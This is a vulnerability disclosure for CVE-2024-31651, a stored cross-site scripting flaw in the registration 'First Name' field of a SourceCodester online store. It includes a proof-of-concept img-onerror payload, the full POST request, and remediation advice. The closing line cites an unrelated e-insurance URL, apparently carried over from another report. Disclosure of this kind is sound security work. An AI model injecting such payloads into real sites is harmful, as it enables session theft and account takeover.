Skip to content

Latest commit

 

History

History
80 lines (60 loc) · 4.29 KB

CVE-2024-31651.md

File metadata and controls

80 lines (60 loc) · 4.29 KB

Stored Cross-Site Scripting Vulnerability in SourceCodester Cosmetics and Beauty Product Online Store - 1.0 :

Vendor: Sourcecodester
Product: Cosmetics and Beauty Product Online Store - 1.0
Product URL: Cosmetics and Beauty Product Online Store - 1.0

Executive Summary

Stored Cross-Site Scripting (SXSS) vulnerability in Cosmetics and Beauty Product Online Store - 1.0 and earlier allows attacker to inject the Malicious JavaScript Code in the "First Name" input field. The malicious code can then be executed whenever the vulnerable web page is accessed by any user, staff or even admin and will remain persistent. It will eventually result in account takeover as the session cookies can be accessed by the malicious JavaScript Code. Issue Details

Vulnerability Name: Stored XSS in First Name
Severity: High
Affected URL: http://localhost/cbpos/classes/Master.php?f=register
Affected Parameter: First Name
HTTP Method: POST

Issue Description

The web application is vulnerable to Cross-Site Scripting (SXSS) attacks in the "First Name" input field. An attacker can exploit this vulnerability by inputting the malicious JavaScript code in the HTTP POST request to create the user. In the provided example, the attacker modifies the "First Name" parameter to insert a malicious JavaScript Code that can also access the authentication cookies. Proof Of Concept

Configure a web proxy in your browser.

Navigate to the URL in the browser http://localhost/cbpos/classes/Master.php?f=register

Fill in the desired data in the input fields. Intercept the request in the web proxy. Modify the First name parameter as shown below and send the request to the server.

firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40

In the browser just create an account and navigate to homepage

https://drive.google.com/file/d/1ZoSWqudhD-uPAmaU_E04IMSdm7VBI_fu/view?usp=drive_link Payload:

firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40
Request:

POST /cbpos/classes/Master.php?f=register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 227
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://localhost/cbpos/
Cookie: PHPSESSID=p74o2f7lqfitvojtejdnshjrau; __insuarance__logged=1; __insuarance__key=7273YL1ZQOZ448QSLS6V
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

firstname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&lastname=%22%3E%3Cimg+src%3Dxx+onerror%3Dalert(1)%3E&contact=6280957713&gender=Male&default_delivery_address=ssdfsfs&email=mohit.ahir7086%40gmail.com&password=Ramasra1247%40

Impact:

Stored XSS attacks can have serious consequences, such as Account takeover by stealing cookies, stealing sensitive data, modifying the content of the web page, or redirecting users to a malicious sites. Remediation:

Implement proper input validation and output encoding to prevent malicious code from being injected into the web application. Use server-side validation to ensure that user input is properly sanitized before being stored in a database or displayed on a web page. Use output encoding to ensure that any user input that is displayed on the web page is properly encoded to prevent malicious code from being executed. References:

https://portswigger.net/web-security/cross-site-scripting/stored

https://owasp.org/www-community/attacks/xss/

Weakness Enumeration:

CWE-79

This report highlights the Stored XSS vulnerability present in the First name parameter of http://localhost/e-insurance/Script./core/new_account, including the Proof of Concept, its impact, remediation steps and references for further guidance on mitigation strategies.